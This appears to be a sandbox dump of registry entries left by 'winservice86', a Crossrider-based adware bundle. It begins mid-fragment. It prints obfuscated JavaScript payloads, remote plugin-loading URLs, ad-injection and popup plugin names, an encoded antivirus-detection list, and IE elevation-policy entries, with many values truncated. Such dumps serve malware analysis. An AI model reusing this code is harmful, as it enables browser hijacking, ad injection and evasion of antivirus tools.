f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\winservice86\Plugins\275]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/275.js"
[HKCU\Software\winservice86\Plugins\41]
"Version" = "7"
[HKCU\Software\winservice86\Plugins\220]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/220.js"
[HKCU\Software\winservice86\Plugins\424]
"Version" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\winservice86\Plugins\262]
"Version" = "2"
[HKCU\Software\winservice86\Manifest]
"homepageurl" = "NA"
[HKCU\Software\winservice86\Plugins\41]
"Name" = "IEInfo"
[HKCU\Software\winservice86\Manifest]
"AddressbarURL" = "NA"
[HKCU\Software\winservice86\Plugins\390]
"Name" = "50pops_new_m"
[HKCU\Software\winservice86\Plugins\339]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\winservice86\Manifest]
"Version" = "43"
"Description" = "winservice"
[HKCU\Software\winservice86\Plugins\94]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/94.js"
[HKCU\Software\winservice86\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI."
[HKCU\Software\winservice86\Plugins\43]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/43.js"
[HKCU\Software\winservice86\Plugins\246]
"JavaScript" = "var _0x4cfc=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""
[HKCU\Software\winservice86\Plugins\180]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/180.js"
[HKCU\Software\winservice86\Plugins\391]
"Version" = "1"
[HKCU\Software\winservice86\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\winservice86\Plugins\14]
"Name" = "CrossriderUtils"
[HKCU\Software\winservice86\Installer]
"DefaultBrowser" = "ie"
"osName" = "XP32"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"
[HKCU\Software\winservice86\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\winservice86\Plugins\91]
"Version" = "87"
[HKCU\Software\winservice86\Plugins\253]
"Name" = "pixel_inject"
[HKCU\Software\winservice86\Manifest]
"Name" = "winservice86"
[HKCU\Software\winservice86\Plugins\45]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/45.js"
[HKCU\Software\winservice86\Plugins\424]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTY1MzBiMWUwMjFiMjUxMTFhNGM1NzUzMGIxZTAyMWI0YTRjNTkxZDVlNWYwMjA3MTcxMTFmMGQxNzE5MWU1ZjAwMDUxYjQ0MTUxYjAyNWY0MzA2MDYwODA1MDQxYzBlMTkwMDQzMTIwYzA3NTkxYzAzM2MxOTBjMGIyZTBiMDcyOTE4MDMwMTI5NDAwNzAyNWMwOTE3MDYwMDAyMWYwOTAzMzgwNzU3MjkzNDMzMzEzOTNkM2UyMzJhMmUzMzM5MmYyMDM3MjMzZDJlMmEyZTI5MzQ1NjAwMTkxYjAzMDUxMTEzMzUwNDE0MDY0YjMxMzIzMjMxMjUyNTM4MjIyYTMyMmIzZjJlMjAyNTIzMjUyNDMxMmYzMTJlM2UyNzJmMjkzNDU2MGExODFkMTkxMDBmMDYxNzFmMTkwYzE4M2EwNDFjMDY1NzI5MzQzMzMxMzkzZDNlMjMyYTJlMzMzOTJmMmEzODNkMzkzMDJmMjYyOTNmMzkyZTMzMzEzMjU3MDIxYTA2MjIzNDVlMjkzMTJlMjMyYzM5MjUzOTM5MjczMzNjMzIzMDMzM2EyOTIyMzQzYzI5NDgyNDMzMmEyOTRiMzQyZjIwMjQyMTNlMjIzMTIzMzIyZTIyM2MzZjIwM2UyNTIyMjYzYTJlMjIzYzIzM2QyODIzM2MyMzMyMzQyZjQ1MTcxZTFkM2YwMjA3MTM1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmYzZDIxM2MyNDM3MjYzNTNjMjk0ODFlMDQwMTIzMzI1NjJmM2MzNTNjMjIyMjMwMzgzZjJmMzUzMTI5MmIzNTI1MjYyNDMyMmUzNDNjMjUzYjJmMmUyYTJlMjkzNDUyNGY1NDA2MTkwNTEzMTkyMzE5MWM0MTRjNGMwNTA1MTcxYTA1NTE1ZjRjMDU1ZDQzMTAwZTBiMGMwNDFlMDIwMTFkNDMxMjBjMDc1OTBlMDgx"
[HKCU\Software\Crossrider]
"Verifier" = "1a7df627a5d721883af6cb9355d58bf1"
[HKCU\Software\winservice86\Plugins\200]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGM2ZDZhNGUxMTAyMWUxZjI0MWYxYjQ1NTk0YzViMWUxZTFiMDE1NzU4NDgxMTE5MTUxMzE5NDEwMjA0MWEwZTBmMGQwYjEyMGYwZTFkMWU1OTA5MDYxODU2MDA1YjQxNDE0MjAwMGYwYTE4MWMxYTAzMWMwNTQyNDY1NzU0NWM1NjI5MzUyYzIzMjIyNDM0MzEyNTNkMzMzODMwMzQzNTIzMjIyZDI4M2MzMjM1M2MyNDJmMjgyZTI3MzMyNjU5MzUzMDM1MjIzYTI2MmEyMjI2Mjk1NTFmMTAxZjAzMDkwNjFlMzcxNzA3MGE0YzMyMjgyNDMxMjMyYTI1MzgyNjM1MjgyNTM4MjIzYzI5MjkyNDJlM2MyODI4Mzg0MTQwNzM3ZjQ4MDcwNTE5MDcxNDM2MWUxNTU0NTA0ZjUzMDUwMzEzMTMxZjQzNTk0NTFkMDQwMTEyMTQ0ZDFmMTAxYjAzMDMxMDFmMTMwMjAyMDAwYTU4MDQwYTA1NDIwMTU2NGQ1YzU2MDEwMjA2MDUwODFiMGUxMDE4NTY0NzVhNTg0MTQyMjgzODIwM2UzNjI1MzkzZDM4MjkzMjM1M2MyOTIxMjIyZjIxMzUyODMzMzgzMDM5M2IyOTIzMmIyZTMyNTgzODNjMjgzNjNiMmIyNjNmMzIyODU4MTMwZDBiMDIwNDBhMDMyMzE2MGEwNjUxMjYyOTI5M2QzZTNlMjQzNTJhMjgzYzI0MzUyZTIxM2QyODI5MjIyMTNjMjkzNTRkNWQ2NzdlNDUxMzAwMGMxMTAzMDEzODA5NTU1ZDQzNWU0OTQ2NjAxMg==', 'wgclyvjoqm'); }"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\winservice86\Plugins\339]
"URL" = "http://js.newcloudrack.com/plugins/mins/339.js"
[HKCU\Software\winservice86\Plugins\78]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/78.js"
[HKCU\Software\winservice86\Plugins\380]
"Version" = "1"
[HKCU\Software\winservice86\Plugins\273]
"Name" = "aedgency_back_button_m"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\winservice86\Plugins\230]
"Version" = "7"
[HKLM\SOFTWARE\winservice86\Installer]
"BundledIe" = "1"
[HKCU\Software\winservice86\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\winservice86\Plugins\345]
"Version" = "47"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\winservice86]
"DisplayName" = "winservice86"
[HKCU\Software\winservice86\Plugins\184]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/184.js"
[HKCU\Software\winservice86\Plugins\17]
"Name" = "jQuery"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{84f03351-931d-41a5-a53d-6b5a7a5a2c96}]
"Verifier" = "1a7df627a5d721883af6cb9355d58bf1"
[HKCU\Software\winservice86\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"
[HKCU\Software\winservice86\Plugins\246]
"Name" = "setup"
[HKCU\Software\winservice86\Plugins\2]
"Version" = "2"
[HKCU\Software\winservice86\Plugins\184]
"Version" = "10"
[HKLM\SOFTWARE\winservice86\Installer]
"BundledAddCh" = "1"
[HKCU\Software\winservice86\Plugins\38]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/38.js"
[HKCU\Software\winservice86\Plugins\339]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWY2NzQzNTk0YjQzNDExMDAzMDQxNDM4MTExNTQ5NTk0MzVhMWYwNDEwMWQ1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTBiMTcwYzA3MDMzMTFmMGY1YjUxNDM0MTEwMDMwNDE0MWU1OTU2NDQxNzAyMGExMDE1MTA0MDE3MTgwNzA2MGQwYzU5MTMwYjAwNGMxMzE4NGMwMDEwNTg0MzViMTkwYTFkNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzMyMjgzMDI4MmQzZDJlMjczYzJiMjIzMjNiMjQyNzI2MzQ0NTBkMTkxYTE1NTkzMjNjM2EzOTJjMzAyYjI1MzkyMDI4MzEyNjJhMzMzMzI3MzkzMTI5MjgzYzI2NGQwYTA3NDUyODJmMjczZjJjMmEzODMxMmEzYzMyMjIzYjJjMzMyOTM0MmEyNzI3Mjg1NjExMWUwNjBiNTYzYzNjM2IyNTNmMzczZTMxMzAyZjI2MzEyNzNlM2UzNzM5MjIzNTI3MjYzMTI3MjIyMzIxM2YzYzMwMmYzYzNjNWE1YjdhNDQ0ZDQzNTk0OTEzMGYw"
[HKCU\Software\winservice86\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\winservice86\Plugins\40]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/40.js"
[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"
[HKCU\Software\winservice86\Plugins\9]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\winservice86\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActic"
[HKCU\Software\winservice86\Plugins\345]
"URL" = "http://js.newcloudrack.com/plugins/mins/345.js"
[HKCU\Software\winservice86\Plugins\78]
"Version" = "5"
[HKCU\Software\winservice86\Plugins\93]
"Version" = "13"
[HKCU\Software\winservice86\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"
[HKCU\Software\winservice86\Plugins\195]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/195.js"
[HKCU\Software\winservice86\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"
[HKCU\Software\winservice86\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\winservice86\Plugins\128]
"Version" = "7"
[HKCU\Software\winservice86\Installer]
"AdditionalInfo" = "{""asw"":[0, 1073750528, 0],""browser_name"":""ie""
[HKCU\Software\winservice86\Plugins\39]
"Name" = "IEDatabase"
[HKCU\Software\winservice86\Manifest]
"EnableSearchIE" = "false"
[HKCU\Software\winservice86\Plugins\390]
"URL" = "http://js.newcloudrack.com/plugins/mins/390.js"
[HKCU\Software\winservice86\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\winservice86\Plugins\42]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/42.js"
[HKCU\Software\winservice86\Plugins\14]
"Version" = "11"
[HKCU\Software\winservice86\Plugins\104]
"Name" = "jollywallet_m"
[HKCU\Software\winservice86\Plugins\3]
"Name" = "ie8_fix_2"
[HKCU\Software\winservice86\Plugins\39]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/39.js"
[HKCU\Software\winservice86\Plugins\289]
"Name" = "covus_logos_m"
[HKCU\Software\winservice86\Plugins\354]
"Version" = "2"
[HKCU\Software\winservice86\Plugins\220]
"JavaScript" = "if(appAPI.isBackground){var ICMBaseManager=function(a){return function(){};};}else{var ICMBaseManager=function(a){var b=(function(g){var i=(function(){var u={\x61\x76\x67\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1,\x61\x76\x61\x73\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2,\x61\x76\x69\x72\x61\x5F\x64\x65\x74\x65\x63\x74\x65\x64:4,\x6D\x73\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:8,\x65\x73\x65\x74\x5F\x64\x65\x74\x65\x63\x74\x65\x64:16,\x69\x6D\x61\x73\x68\x5F\x64\x65\x74\x65\x63\x74\x65\x64:32,\x76\x69\x70\x65\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:64,\x61\x73\x6B\x74\x6F\x6F\x6C\x62\x61\x72\x5F\x64\x65\x74\x65\x63\x74\x65\x64:128,\x64\x65\x61\x6C\x70\x6C\x79\x5F\x64\x65\x74\x65\x63\x74\x65\x64:256,\x66\x75\x6E\x6D\x6F\x6F\x64\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:512,\x6D\x63\x61\x66\x65\x65\x5F\x64\x65\x74\x65\x63\x74\x65\x64:1024,\x6D\x61\x6C\x77\x61\x72\x65\x62\x79\x74\x65\x73\x5F\x64\x65\x74\x65\x63\x74\x65\x64:2048,\x62\x61\x69\x64\x75\x61\x76\x5F\x64\x65\x74\x65\x63\x74\x65\x64"
[HKCU\Software\winservice86\Manifest]
"PublisherName" = "Corporate Inc"
"Manifest" = "NA"
"UninstallerOfferUrl" = "NA"
[HKCU\Software\winservice86\Plugins\390]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ2ZDY4NWEwYzFmMTMxNTNiMDMxYTQ1NWI1ODQ2MDMxMzExMWU0YjU5NDgwMjFjMGEwODA2MDYwNjE0NWIwNjRmMTkwZjBhMGEwNDA3MTkxMjQ5MGYxZDEwNDQxNDEwMGM1ZTFlNTc1ODQwNTYwOTAyNGEzMTJlMzUzNTJlMmIzNzM5MmUyMTJiMjMyOTIyMzkyYzIxMjUyMzIwMmEyZTI1MzIyMzI3MmQyZjM4M2E0MTFkNTgwZDEyNDcxNDAyMDM1ODVjNDM0ZjUyNDcxZDFjMWY1YTNhMzEzMjI0MjgzMjJiMzYyMjIzMjAzYzJlMzczNzMxMjcyYTJhMmEyMDMxMmU1NDRiNmI3MTQ2MDMxMzExMWUwMjIzMTUwZDVhNWU0YjQ1MGQxYTA1MDYxNDViNTc0YjA4MDMwYjBkMTAxNTBmMDQ1NTA1NDUwNjBlMGYxYzE3MGUwOTFjNGEwNTAyMTE0MTAyMDMwNTRlMTA1NDUyNWY1NzBjMTQ1OTM4M2UzYjM2MjQzNDM2M2MzODMyMjIzMzI3MjEzMzMzMjAyMDM1MzMyMzNlMmIzMTI5MzgyYzJhMmUyOTQ4MGQ1NjBlMTg1ODE1MDcxNTRiNTU1MzQxNTE0ZDAyMWQxYTRjMjkzODIyMmEyYjM4MzQzNzI3MzUzMzM1M2UzOTM0M2IzODJiMmYzYzMzMzgzZTVhNDg2MTZlNDcxZTFkMDMwMDA4MTYyZDBmNDU1ZjRlNDI0ZjU3NmIwNQ==', 'vgaxdkgenq'); }"
[HKCU\Software\winservice86\Plugins\38]
"Name" = "IECallbacks"
[HKCU\Software\winservice86\Plugins\376]
"URL" = "http://js.newcloudrack.com/plugins/mins/376.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\winservice86\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\winservice86\Plugins\180]
"Version" = "12"
[HKCU\Software\winservice86\Plugins\311]
"URL" = "http://js.newcloudrack.com/plugins/mins/311.js"
[HKCU\Software\winservice86\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars1"
[HKCU\Software\winservice86\Plugins\40]
"Version" = "4"
[HKCU\Software\winservice86\Plugins\289]
"Version" = "3"
[HKCU\Software\winservice86\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\winservice86\Plugins\193]
"Version" = "9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\winservice86\Plugins\391]
"URL" = "http://js.newcloudrack.com/plugins/mins/391.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\winservice86\Plugins\380]
"URL" = "http://js.newcloudrack.com/plugins/mins/380.js"
[HKCU\Software\winservice86\Plugins\391]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTk0YjAwMWYwMTE3MmQxYTFlNTM1ODRiMDAxZjAxMTc0MjQ3NWQxMjA2MDcwYjBhMTYwZjFkNDUxMzVmMDMwMjA5MDYxNDBlMTAwYzVjMWYwNzFkNDcxODAwMDU1NzAwNDI0ODVhNWIwYTBlNWEzODI3MmIyMDNlMzEzYTNhMjIzMTIyMmEzNzM3MjkzNjJjMjYyZjMwMjMyNzNiMjczMzNkMjAyYzM0MmE0ODE0NDYxODAyNWQxOTAxMGY0ODU1NGE1MTQ2NTcwNzExMWM1NjJhMzgzYjNhM2QyMjMxM2IyMTJmMzAzNTI3MjkyMjIxM2QyNzI5MjYzMDM4Mjc0YTVlNTMwYTFkMWMxYjA2MzIwYTA0NTA0YjQwMDExYzFmMDUxNDQyNDc1ZDEyMDYwNzBiMGExNjBmMWQ0NTEzNWYwMzAyMDkwNjE0MGUxMDBjNWMxZjA3MWQ0NzE4MDAwNTU3MDA0MjQ4NWE1YjBhMGU1YTM4MjcyYjIwM2UzMTNhM2EyMjMxMjIyYTM3MzcyOTM2MmMyNjJmMzAyMzI3M2IyNzMzM2QyMDJjMzQyYTQ4MTQ0NjE4MDI1ZDE5MDEwZjQ4NTU0YTUxNDY1NzA3MTExYzU2MmEzODNiM2EzZDIyMzEzYjIxMmYzMDM1MjcyOTIyMjEzZDI3MjkyNjMwMzgyNzRhNWU1MzEyMDUxZDBjMWMwOTMxMGM1MDRiNTE1MDU5MTY=', 'bihkugxhrq'); }"
[HKCU\Software\winservice86\Plugins\354]
"JavaScript" = "__CTG_MAPPING__={""1"":[""d908e50170d7cb46a92fdbff0d73bb5d""
[HKCU\Software\Crossrider]
"Bic" = "8D4C23D6A4134239976F389726A57621IE"
[HKCU\Software\winservice86\Plugins\275]
"Name" = "pricedetect_sidebar_small_m"
[HKCU\Software\winservice86\Plugins\47]
"URL" = "http://js.newdemoonlinecloud.com/plugins/mins/47.js"
[HKCU\Software\winservice86\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{132cc74c-c1b1-4c00-8ea0-e4d27a15def2}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8b7f6268-f316-4f24-b4a4-efb0124290bd}]
"AppPath" = "%Program Files%\winservice86"
[HKCU\Software\winservice86\Installer]
"Time" = "1456422014"
[HKCU\Software\winservice86\Plugins\47]
